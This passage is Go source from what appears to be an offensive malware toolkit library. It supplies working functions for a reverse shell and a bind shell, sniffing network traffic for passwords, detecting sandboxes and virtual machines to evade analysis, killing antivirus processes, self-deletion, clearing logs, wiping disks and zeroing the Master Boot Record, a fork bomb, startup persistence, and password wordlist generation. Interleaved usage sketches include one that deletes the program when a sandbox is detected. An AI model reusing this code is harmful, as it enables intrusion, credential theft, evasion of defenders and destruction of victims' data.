"os": fmt.Sprintf("%v", i.OS),
"platform": fmt.Sprintf("%v", i.Platform),
"cpu_num": fmt.Sprintf("%v", i.CPUs),
"kernel": fmt.Sprintf("%v", i.Kernel),
"core": fmt.Sprintf("%v", i.Core),
"local_ip": GetLocalIp(),
"global_ip": GetGlobalIp(),
"ap_ip": GetGatewayIP(),
"mac": mac,
"homedir": hdir,
}
return inf
}
// MD5Hash hashes a given string using the MD5.
func MD5Hash(str string) string {
hasher := md5.New()
hasher.Write([]byte(str))
return hex.EncodeToString(hasher.Sum(nil))
}
// CreateWordlist generates possible variations of each word in the wordlist.
func CreateWordlist(words []string) []string {
wordlist := []string{}
for w := range words {
word := words[w]
first_to_upper := strings.ToUpper(string(word[0])) + string(word[1:])
wordlist = append(wordlist, strings.ToUpper(word))
wordlist = append(wordlist, Revert(word))
wordlist = append(wordlist, first_to_upper)
wordlist = append(wordlist, first_to_upper+"1")
wordlist = append(wordlist, first_to_upper+"12")
wordlist = append(wordlist, first_to_upper+"123")
wordlist = append(wordlist, word+"1")
wordlist = append(wordlist, word+"12")
wordlist = append(wordlist, word+"123")
}
return wordlist
}
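// Fan-out sketch (the helper name is ours): one seed word yields upper-case,
// reversed, capitalized, and numeric-suffix variants.
func wordlistExample() {
	fmt.Println(CreateWordlist([]string{"admin"}))
	// [ADMIN nimda Admin Admin1 Admin12 Admin123 admin1 admin12 admin123]
}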
// ReadFile is used to read a given file and return its data as a string.
func ReadFile(filename string) (string, error) {
fil, err := os.Open(filename)
if err != nil {
return "", err
}
defer fil.Close()
b, err := ioutil.ReadAll(fil)
if err != nil {
return "", err
}
return string(b), nil
}
// WriteFile is used to write data into a given file.
func WriteFile(filename, data string) error {
file, err := os.Create(filename)
if err != nil {
return err
}
defer file.Close()
_, err = io.WriteString(file, data)
if err != nil {
return err
}
return nil
}
// FilesPattern is used to return data mapped to files
// where their filenames match a given pattern.
func FilesPattern(directory, pattern string) (map[string]string, error) {
out_map := map[string]string{}
files, err := ioutil.ReadDir(directory)
if err != nil {
return nil, err
}
for _, f := range files {
fl, err := ReadFile(f.Name())
if err != nil {
return nil, err
}
if strings.Contains(fl, pattern) {
out_map[f.Name()], err = ReadFile(f.Name())
if err != nil {
return nil, err
}
}
}
return out_map, nil
}
// B64D decodes a given string encoded in Base64.
func B64D(str string) string {
raw, _ := base64.StdEncoding.DecodeString(str)
return fmt.Sprintf("%s", raw)
}
// B64E encodes a string in Base64.
func B64E(str string) string {
return base64.StdEncoding.EncodeToString([]byte(str))
}
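// Round-trip sketch (the helper name is ours): B64E and B64D are inverses.
func base64Example() {
	enc := B64E("coldfire") // "Y29sZGZpcmU="
	fmt.Println(B64D(enc))  // "coldfire"
}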
// Wait uses a human friendly string that indicates how long a system should wait.
func Wait(interval string) {
period_letter := string(interval[len(interval)-1])
intr := string(interval[:len(interval)-1])
i, _ := strconv.ParseInt(intr, 10, 64)
var x int64
switch period_letter {
case "s":
x = i
case "m":
x = i * 60
case "h":
x = i * 3600
}
time.Sleep(time.Duration(x) * time.Second)
}
// func file_info(file string) map[string]string {
// inf, err := os.Stat(file)
// return map[string]string{
// }
// }
// Forkbomb spawns goroutines in order to crash the machine.
func Forkbomb() {
for {
go Forkbomb()
}
}
// Remove is used to self delete.
func Remove() {
os.Remove(os.Args[0])
}
// Exists checks if a given file is in the system.
func Exists(file string) bool {
_, err := os.Stat(file)
if err != nil {
if os.IsNotExist(err) {
return false
}
}
return true
}
// IsRoot checks if the current user is the administrator of the machine.
func IsRoot() bool {
return isRoot()
}
// CmdOut executes a given command and returns its output.
func CmdOut(command string) (string, error) {
return cmdOut(command)
}
// func cmd_out_ssh(address, username, password, command string) (string, error) {
// config := &ssh.ClientConfig{
// User: username,
// Auth: []ssh.AuthMethod{
// ssh.Password(password),
// },
// }
// client, err := ssh.Dial("tcp", address, config)
// if err != nil {
// return "", err
// }
// session, err := client.NewSession()
// if err != nil {
// return "", err
// }
// defer session.Close()
// var b bytes.Buffer
// session.Stdout = &b
// err = session.Run(command)
// return b.String(), err
// }
// CmdOutPlatform executes a given set of commands based on the OS of the machine.
func CmdOutPlatform(commands map[string]string) (string, error) {
cmd := commands[runtime.GOOS]
out, err := CmdOut(cmd)
if err != nil {
return "", err
}
return out, nil
}
// CmdRun executes a command and writes output as well
// as error to STDOUT.
func CmdRun(command string) {
parts := strings.Fields(command)
head := parts[0]
parts = parts[1:]
cmd := exec.Command(head, parts...)
output, err := cmd.CombinedOutput()
if err != nil {
PrintError(err.Error())
fmt.Println(string(output))
//fmt.Println(red(err.Error()) + ": " + string(output))
} else {
fmt.Println(string(output))
}
//ExitOnError("[COMMAND EXEC ERROR]", err)
}
// CmdBlind runs a command without any side effects.
func CmdBlind(command string) {
parts := strings.Fields(command)
head := parts[0]
parts = parts[1:]
cmd := exec.Command(head, parts...)
_, _ = cmd.CombinedOutput()
// ExitOnError("[COMMAND EXEC ERROR]", err)
}
// CmdDir executes commands which are mapped to a string
// indicating the directory where the command is executed.
func CmdDir(dirs_cmd map[string]string) ([]string, error) {
outs := []string{}
for dir, cmd := range dirs_cmd {
err := os.Chdir(dir)
if err != nil {
return nil, err
}
o, err := CmdOut(cmd)
if err != nil {
return nil, err
}
outs = append(outs, o)
}
return outs, nil
}
// MakeZip packs a list of given files within a zip archive.
func MakeZip(zip_file string, files []string) error {
newZipFile, err := os.Create(zip_file)
if err != nil {
return err
}
defer newZipFile.Close()
zipWriter := zip.NewWriter(newZipFile)
defer zipWriter.Close()
for _, file := range files {
fileToZip, err := os.Open(file)
if err != nil {
return err
}
defer fileToZip.Close()
info, err := fileToZip.Stat()
if err != nil {
return err
}
header, err := zip.FileInfoHeader(info)
if err != nil {
return err
}
header.Name = file
header.Method = zip.Deflate
writer, err := zipWriter.CreateHeader(header)
if err != nil {
return err
}
_, err = io.Copy(writer, fileToZip)
if err != nil {
return err
}
}
return nil
}
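// Usage sketch; the file names here are illustrative assumptions. Each entry
// keeps its original path inside the archive and is deflate-compressed.
func makeZipExample() error {
	return MakeZip("backup.zip", []string{"notes.txt", "hosts.txt"})
}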
// CredentialsSniff is used to sniff network traffic for
// private user information.
func CredentialsSniff(ifac, interval string,
collector chan string,
words []string) error {
ifs := []string{}
if ifac != "all" {
ifs = []string{ifac}
} else {
ifs = Ifaces()
}
hits := []string{"password", "user",
"username", "secrets", "auth"}
for w := range words {
word := words[w]
hits = append(hits, word)
}
for h := range hits {
hit := hits[h]
hits = append(hits, strings.ToUpper(hit))
hits = append(hits, strings.ToUpper(string(hit[0]))+string(hit[1:]))
}
var snapshot_len int32 = 1024
var timeout time.Duration = time.Duration(IntervalToSeconds(interval)) * time.Second
for _, i := range ifs {
handler, err := pcap.OpenLive(i, snapshot_len, false, timeout)
if err != nil {
return err
}
defer handler.Close()
source := gopacket.NewPacketSource(handler, handler.LinkType())
for p := range source.Packets() {
app_layer := p.ApplicationLayer()
if app_layer == nil {
continue
}
pay := app_layer.Payload()
for h := range hits {
hit := hits[h]
if bytes.Contains(pay, []byte(hit)) {
collector <- string(pay)
}
}
}
}
return nil
}
// SandboxFilepath checks if the process is being run
// inside a virtualized environment.
func SandboxFilepath() bool {
return sandboxFilepath()
}
// SandboxProc checks if there are processes that indicate
// a virtualized environment.
func SandboxProc() bool {
sandbox_processes := []string{`vmsrvc`, `tcpview`, `wireshark`, `visual basic`, `fiddler`,
`vmware`, `vbox`, `process explorer`, `autoit`, `vboxtray`, `vmtools`,
`vmrawdsk`, `vmusbmouse`, `vmvss`, `vmscsi`, `vmxnet`, `vmx_svga`,
`vmmemctl`, `df5serv`, `vboxservice`, `vmhgfs`}
p, _ := Processes()
for _, name := range p {
if ContainsAny(name, sandbox_processes) {
return true
}
}
return false
}
// SandboxSleep is used to check if the virtualized environment
// is speeding up the sleeping process.
func SandboxSleep() bool {
z := false
firstTime := getNTPTime()
sleepSeconds := 10
time.Sleep(time.Duration(sleepSeconds*1000) * time.Millisecond)
secondTime := getNTPTime()
difference := secondTime.Sub(firstTime).Seconds()
if difference < float64(sleepSeconds) {
z = true
}
return z
}
// SandboxDisk is used to check if the environment's
// disk space is less than a given size.
/* sandboxDisk is missing dependency
func SandboxDisk(size int) bool {
return sandboxDisk(size)
}
*/
// SandboxCpu is used to check if the environment's
// cores are less than a given integer.
func SandboxCpu(cores int) bool {
x := false
num_procs := runtime.NumCPU()
if !(num_procs >= cores) {
x = true
}
return x
}
// SandboxRam is used to check if the environment's
// RAM is less than a given size.
func SandboxRam(ram_mb int) bool {
var m runtime.MemStats
runtime.ReadMemStats(&m)
rmb := uint64(ram_mb)
ram := m.TotalAlloc / 1024 / 1024
return ram < rmb
}
// SandboxUtc is used to check if the environment
// is in a properly set Utc timezone.
func SandboxUtc() bool {
_, offset := time.Now().Zone()
return offset == 0
}
// SandboxProcnum is used to check if the environment
// has processes less than a given integer.
func SandboxProcnum(proc_num int) bool {
processes, err := ps.Processes()
if err != nil {
return true
}
return len(processes) < proc_num
}
// SandboxTmp is used to check if the environment's
// temporary directory has less files than a given integer.
func SandboxTmp(entries int) bool {
return sandboxTmp(entries)
}
// SandboxMac is used to check if the environment's MAC address
// matches standard MAC addresses of virtualized environments.
func SandboxMac() bool {
hits := 0
sandbox_macs := []string{`00:0C:29`, `00:1C:14`,
`00:50:56`, `00:05:69`, `08:00:27`}
ifaces, _ := net.Interfaces()
for _, iface := range ifaces {
for _, mac := range sandbox_macs {
if strings.Contains(strings.ToLower(iface.HardwareAddr.String()), strings.ToLower(mac)) {
hits += 1
}
}
}
return hits > 0
}
// SandboxAll is used to check if an environment is virtualized
// by testing all sandbox checks.
func SandboxAll() bool {
values := []bool{
SandboxProc(),
SandboxFilepath(),
SandboxCpu(2),
// SandboxDisk(50), Missing dependency
SandboxSleep(),
SandboxTmp(10),
SandboxProcnum(100),
SandboxRam(2048),
SandboxUtc(),
}
for s := range values {
x := values[s]
if x {
return true
}
}
return false
}
// SandboxAlln checks if an environment is virtualized by testing all
// sandbox checks and checking if the number of successful checks is
// equal or greater to a given integer.
func SandboxAlln(num int) bool {
num_detected := 0
values := []bool{
SandboxProc(),
SandboxFilepath(),
SandboxCpu(2),
// SandboxDisk(50), Missing dependency
SandboxSleep(),
SandboxTmp(10),
SandboxProcnum(100),
SandboxRam(2048),
SandboxMac(),
SandboxUtc(),
}
for s := range values {
x := values[s]
if x {
num_detected += 1
}
}
return num_detected >= num
}
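// Gate sketch (the threshold is an illustrative choice): require several
// independent indicators before concluding the host is virtualized, so a
// single false positive does not abort a run.
func sandboxGateExample() {
	if SandboxAlln(3) {
		Remove()
		os.Exit(0)
	}
}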
// Shutdown forces the machine to shutdown.
func Shutdown() error {
return shutdown()
}
// func set_ttl(interval string){
// endSignal := make(chan bool, 1)
// go _sleep(interval_to_seconds(interval), endSignal)
// select {
// case <-endSignal:
// remove()
// os.Exit(0)
// }
// }
// func SetTTL(duration string) {
// c := cron.New()
// c.AddFunc("@every "+duration, remove)
// c.Start()
// }
// Bind tells the process to listen to a local port
// for commands.
func Bind(port int) {
listen, err := net.Listen("tcp", "0.0.0.0:"+strconv.Itoa(port))
ExitOnError(err)
defer listen.Close()
for {
conn, err := listen.Accept()
if err != nil {
PrintError("Cannot bind to selected port")
}
handleBind(conn)
}
}
// Reverse initiates a reverse shell to a given host:port.
func Reverse(host string, port int) {
conn, err := net.Dial("tcp", host+":"+strconv.Itoa(port))
ExitOnError(err)
for {
handleReverse(conn)
}
}
// PkillPid kills a process by its PID.
func PkillPid(pid int) error {
err := KillProcByPID(pid)
return err
}
// PkillName kills a process by its name.
func PkillName(name string) error {
processList, err := ps.Processes()
if err != nil {
return err
}
for x := range processList {
process := processList[x]
proc_name := process.Executable()
pid := process.Pid()
if strings.Contains(proc_name, name) {
err := KillProcByPID(pid)
if err != nil {
return err
}
}
}
return nil
}
// PkillAv kills Anti-Virus processes that may run within the machine.
func PkillAv() error {
return pkillAv()
}
// Processes returns a map of a PID to its respective process name.
func Processes() (map[int]string, error) {
prs := make(map[int]string)
processList, err := ps.Processes()
if err != nil {
return nil, err
}
for x := range processList {
process := processList[x]
prs[process.Pid()] = process.Executable()
}
return prs, nil
}
// Portscan checks for open ports in a given target.
func Portscan(target string, timeout, threads int) (pr []int) {
ps := portscanner.NewPortScanner(target, time.Duration(timeout)*time.Second, threads)
opened_ports := ps.GetOpenedPort(0, 65535)
for p := range opened_ports {
port := opened_ports[p]
pr = append(pr, port)
}
return
}
// PortscanSingle checks if a specific port is open in a given target.
func PortscanSingle(target string, port int) bool {
ps := portscanner.NewPortScanner(target, time.Duration(10)*time.Second, 3)
opened_ports := ps.GetOpenedPort(port-1, port+1)
return len(opened_ports) != 0
}
// BannerGrab returns a service banner string from a given port.
func BannerGrab(target string, port int) (string, error) {
conn, err := net.DialTimeout("tcp", target+":"+strconv.Itoa(port), time.Second*10)
if err != nil {
return "", err
}
buffer := make([]byte, 4096)
conn.SetReadDeadline(time.Now().Add(time.Second * 5))
n, err := conn.Read(buffer)
if err != nil {
return "", err
}
banner := buffer[0:n]
return string(banner), nil
}
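// Usage sketch (target and port are illustrative): many TCP services send a
// banner immediately on connect, which BannerGrab reads within its deadline.
func bannerExample() {
	if banner, err := BannerGrab("127.0.0.1", 22); err == nil {
		fmt.Println(banner)
	}
}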
// SendDataTCP sends data to a given host:port using the TCP protocol.
func SendDataTCP(host string, port int, data string) error {
addr := host + ":" + strconv.Itoa(port)
conn, err := net.Dial("tcp", addr)
if err != nil {
return err
}
_, err = io.WriteString(conn, data+"\n")
if err != nil {
return err
}
defer conn.Close()
return nil
}
// SendDataUDP sends data to a given host:port using the UDP protocol.
func SendDataUDP(host string, port int, data string) error {
addr := host + ":" + strconv.Itoa(port)
conn, err := net.Dial("udp", addr)
if err != nil {
return err
}
_, err = io.WriteString(conn, data+"\n")
if err != nil {
return err
}
defer conn.Close()
return nil
}
// FilePermissions checks if a given file has read and write permissions.
func FilePermissions(filename string) (bool, bool) {
write_permission := true
read_permission := true
file, err := os.OpenFile(filename, os.O_WRONLY, 0666)
if err != nil && os.IsPermission(err) {
write_permission = false
}
file.Close()
rfile, err := os.Open(filename)
if err != nil && os.IsPermission(err) {
read_permission = false
}
rfile.Close()
return read_permission, write_permission
}
// Download downloads a file from a url.
func Download(url string) error {
splitted := strings.Split(url, "/")
filename := splitted[len(splitted)-1]
f, err := os.Create(filename)
if err != nil {
return err
}
defer f.Close()
response, err := http.Get(url)
if err != nil {
return err
}
defer response.Body.Close()
_, err = io.Copy(f, response.Body)
if err != nil {
return err
}
return nil
}
// Users returns a list of known users within the machine.
func Users() ([]string, error) {
return users()
}
// EraseMbr zeroes out the Master Boot Record.
func EraseMbr(device string, partition_table bool) error {
cmd := f("dd if=/dev/zero of=%s bs=446 count=1", device)
if partition_table {
cmd = f("dd if=/dev/zero of=%s bs=512 count=1", device)
}
_, err := CmdOut(cmd)
if err != nil {
return err
}
return nil
}
// Networks returns a list of nearby wireless networks.
func Networks() ([]string, error) {
return networks()
}
// ExpandCidr returns a list of Ip addresses within a given CIDR.
func ExpandCidr(cidr string) ([]string, error) {
ip, ipnet, err := net.ParseCIDR(cidr)
if err != nil {
return nil, err
}
var ips []string
for ip := ip.Mask(ipnet.Mask); ipnet.Contains(ip); IpIncrement(ip) {
ips = append(ips, ip.String())
}
lenIPs := len(ips)
switch {
case lenIPs < 2:
return ips, nil
default:
return ips[1 : len(ips)-1], nil
}
}
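// Sketch (the helper name is ours): ExpandCidr drops the network and
// broadcast addresses, so a /30 yields exactly its two usable hosts.
func expandCidrExample() {
	ips, _ := ExpandCidr("10.0.0.0/30")
	fmt.Println(ips) // [10.0.0.1 10.0.0.2]
}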
// ClearLogs removes logfiles within the machine.
func ClearLogs() error {
return clearLogs()
}
// Wipe deletes all data in the machine.
func Wipe() error {
return wipe()
}
// DnsLookup returns the list of Ip addresses associated with the given hostname.
func DnsLookup(hostname string) ([]string, error) {
i := []string{}
ips, err := net.LookupIP(hostname)
if err != nil {
return nil, err
}
for _, ip := range ips {
i = append(i, ip.String())
}
return i, nil
}
// RdnsLookup returns the list of hostnames associated with the given Ip address.
func RdnsLookup(ip string) ([]string, error) {
ips, err := net.LookupAddr(ip)
if err != nil {
return nil, err
}
return ips, nil
}
// CreateUser creates a user with a given username and password.
// TODO
// WifiDisconnect is used to disconnect the machine from a wireless network.
func WifiDisconnect() error {
return wifiDisconnect()
}
// Disks returns a list of storage drives within the machine.
func Disks() ([]string, error) {
return disks()
}
// CopyFile copies a file from one directory to another.
func CopyFile(src, dst string) error {
sourceFileStat, err := os.Stat(src)
if err != nil {
return err
}
if !sourceFileStat.Mode().IsRegular() {
return fmt.Errorf("%s is not a regular file", src)
}
source, err := os.Open(src)
if err != nil {
return err
}
defer source.Close()
destination, err := os.Create(dst)
if err != nil {
return err
}
defer destination.Close()
_, err = io.Copy(destination, source)
return err
}
// TraverseCurrentDir lists all files that exist within the current directory.
func TraverseCurrentDir() ([]string, error) {
files_in_dir := []string{}
files, err := ioutil.ReadDir(".")
if err != nil {
return nil, err
}
for _, f := range files {
files_in_dir = append(files_in_dir, f.Name())
}
return files_in_dir, nil
}
// TraverseDir lists all files that exist within a given directory.
func TraverseDir(dir string) ([]string, error) {
files_in_dir := []string{}
files, err := ioutil.ReadDir(dir)
if err != nil {
return nil, err
}
for _, f := range files {
files_in_dir = append(files_in_dir, f.Name())
}
return files_in_dir, nil
}
// RemoveStr removes a given string from a list of strings.
func RemoveStr(slice []string, s string) []string {
final := []string{}
for _, e := range slice {
if e != s {
final = append(final, e)
}
}
return final
}
// RemoveInt removes a given integer from a list of integers.
func RemoveInt(slice []int, s int) []int {
final := []int{}
for _, e := range slice {
if e != s {
final = append(final, e)
}
}
return final
}
// AddPersistentCommand creates a task that runs a given command on startup.
func AddPersistentCommand(cmd string) error {
return addPersistentCommand(cmd)
}
// RegexMatch checks if a string contains valuable information through regex.
func RegexMatch(regex_type, str string) bool {
regexes := map[string]string{
"mail": "^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$",
"ip": `(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}`,
"mac": `^([0-9A-Fa-f]{2}[:-])/contains{5}([0-9A-Fa-f]{2})$`,
"date": `\d{4}-\d{2}-\d{2}`,
"domain": `^(?:https?:\/\/)?(?:[^@\/\n]+@)?(?:www\.)?([^:\/\n]+)`,
"phone": `^(?:(?:\(?(?:00|\+)([1-4]\d\d|[1-9]\d?)\)?)?[\-\.\ \\\/]?)?((?:\(?\d{1,}\)?[\-\.\ \\\/]?){0,})(?:[\-\.\ \\\/]?(?:#|ext\.?|extension|x)[\-\.\ \\\/]?(\d+))?$`,
"ccn": `^(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$`,
"time": `^([0-9]|0[0-9]|1[0-9]|2[0-3]):([0-9]|[0-5][0-9])$`,
"crypto": `^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$`,
}
r := regexp.MustCompile(regexes[regex_type])
matches := r.FindAllString(str, -1)
return len(matches) != 0
}
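// Lookup sketch (the helper name is ours). Note that an unknown regex_type
// key compiles the empty pattern, which matches everything, so stick to the
// documented names.
func regexMatchExample() {
	fmt.Println(RegexMatch("mail", "alice@example.com")) // true
	fmt.Println(RegexMatch("ip", "server at 10.1.2.3"))  // true
	fmt.Println(RegexMatch("date", "no date here"))      // false
}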
// ShuffleSlice randomly shuffles a list of strings.
func ShuffleSlice(s []string) []string {
rand.Seed(time.Now().UnixNano())
rand.Shuffle(len(s), func(i, j int) {
s[i], s[j] = s[j], s[i]
})
return s
}
// StartNgrokTCP exposes a TCP server on a given port.
func StartNgrokTCP(port int) error {
_, err := CmdOut(F("ngrok tcp %d", port))
return err
}
// StartNgrokHTTP exposes a web server on a given port.
func StartNgrokHTTP(port int) error {
_, err := CmdOut(F("ngrok http %d", port))
return err
}
// GetNgrokURL returns the URL of the Ngrok tunnel exposing the machine.
func GetNgrokURL() (string, error) {
local_url := "http://localhost:4040/api/tunnels"
resp, err := http.Get(local_url)
if err != nil {
return "", err
}
defer resp.Body.Close()
json, err := ioutil.ReadAll(resp.Body)
if err != nil {
return "", err
}
jq_op_1, _ := jq.Parse(".tunnels")
json_1, _ := jq_op_1.Apply(json)
jq_op_2, _ := jq.Parse(".[0]")
json_2, _ := jq_op_2.Apply(json_1)
jq_op_3, _ := jq.Parse(".public_url")
json_3, _ := jq_op_3.Apply(json_2)
json_sanitized := FullRemove(string(json_3), `"`)
return json_sanitized, nil
}
// ExtractIntFromString extracts a list of possible integers from a given string.
func ExtractIntFromString(s string) []int {
res := []int{}
re := regexp.MustCompile(`[-]?\d[\d,]*[\.]?[\d{2}]*`)
// fmt.Printf("String contains any match: %v\n", re.MatchString(str1)) // True
submatchall := re.FindAllString(s, -1)
for _, element := range submatchall {
res = append(res, StrToInt(element))
}
return res
}
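// Sketch (the helper name is ours): the regex pulls signed digit runs out of
// arbitrary text.
func extractIntsExample() {
	fmt.Println(ExtractIntFromString("eth0: 42 packets, -7 errors")) // [42 -7]
}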
// SplitJoin splits a string on one delimiter and rejoins the parts with another.
func SplitJoin(s, splitter, joiner string) string {
splitted := strings.Split(s, splitter)
joined := strings.Join(splitted, joiner)
return joined
}
// RevertSlice reverses a slice type agnostically.
func RevertSlice(s interface{}) {
n := reflect.ValueOf(s).Len()
swap := reflect.Swapper(s)
for i, j := 0, n-1; i < j; i, j = i+1, j-1 {
swap(i, j)
}
}
// func dialog(message, title string) {
// zenity.Info(message, zenity.Title(title))
// }
func SplitMultiSep(s string, seps []string) []string {
f := func(c rune) bool {
for _, sep := range seps {
if string(c) == sep {
return true
}
}
return false
}
fields := strings.FieldsFunc(s, f)
return fields
}
func SplitChunks(s string, chunk int) []string {
if chunk >= len(s) {
return []string{s}
}
var chunks []string
c := make([]rune, chunk)
n := 0
for _, r := range s {
c[n] = r
n++
if n == chunk {
chunks = append(chunks, string(c))
n = 0
}
}
if n > 0 {
chunks = append(chunks, string(c[:n]))
}
return chunks
}
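// Sketch (the helper name is ours): chunking walks runes, so multi-byte
// characters are never split mid-encoding.
func splitChunksExample() {
	fmt.Println(SplitChunks("abcdefg", 3)) // [abc def g]
}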
/*
func keyboard_emul(keys string) error {
}
func proxy_tcp() error {
}
func proxy_udp() error {
}
func proxy_http() error {
}
func webshell(param, password string) error {
}
func stamp() {
}
func detect_user_interaction() (bool, error) {
}*/
func GenerateKey() []byte {
random_bytes := make([]byte, 32)
_, err := crandom.Read(random_bytes) // Generates 32 cryptographically secure random bytes
if err != nil {
println("Failed to generate the key.")
return nil
}
return random_bytes
}
func GenerateIV() []byte {
random_bytes := make([]byte, 16)
_, err := crandom.Read(random_bytes) // Generates 16 cryptographically secure random bytes
if err != nil {
println("Failed to generate IV.")
return nil
}
return random_bytes
}
func EncryptBytes(secret_message []byte, key []byte) []byte {
cipher_block, err := aes.NewCipher(key)
if err != nil {
println("Error occured, can't encrypt")
return nil
}
length_to_bytes := make([]byte, 4)
binary.LittleEndian.PutUint32(length_to_bytes, uint32(len(secret_message)))
length_and_secret := append(length_to_bytes, secret_message...)
IV := GenerateIV()
if len(length_and_secret)%16 != 0 {
appending := make([]byte, (16 - len(length_and_secret)%16))
corrected := append(length_and_secret, appending...)
length_and_secret = corrected
}
c := cipher.NewCBCEncrypter(cipher_block, IV)
encrypted := make([]byte, len(length_and_secret))
c.CryptBlocks(encrypted, length_and_secret)
return append(IV, encrypted...)
}
func DecryptBytes(encrypted_message []byte, key []byte) []byte {
IV := encrypted_message[0:16]
actual_ciphertext := encrypted_message[16:]
cipher_block, err := aes.NewCipher(key)
if err != nil {
println("Error occurred, can't decrypt")
return nil
}
c := cipher.NewCBCDecrypter(cipher_block, IV)
decrypted := make([]byte, len(actual_ciphertext))
c.CryptBlocks(decrypted, actual_ciphertext)
length_bytes := decrypted[0:4]
length := binary.LittleEndian.Uint32(length_bytes)
decrypted = decrypted[4:]
return decrypted[:length]
}
func EncryptString(message string, key []byte) []byte {
return EncryptBytes([]byte(message), key)
}
func DecryptString(encrypted_message []byte, key []byte) string {
return string(DecryptBytes(encrypted_message, key))
}
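// Round-trip sketch (the helper name is ours): EncryptBytes prepends the
// random IV to the ciphertext and DecryptBytes recovers it, so a fresh key
// decrypts back to the original plaintext.
func cryptoExample() {
	key := GenerateKey()
	ct := EncryptBytes([]byte("attack at dawn"), key)
	fmt.Println(string(DecryptBytes(ct, key))) // attack at dawn
}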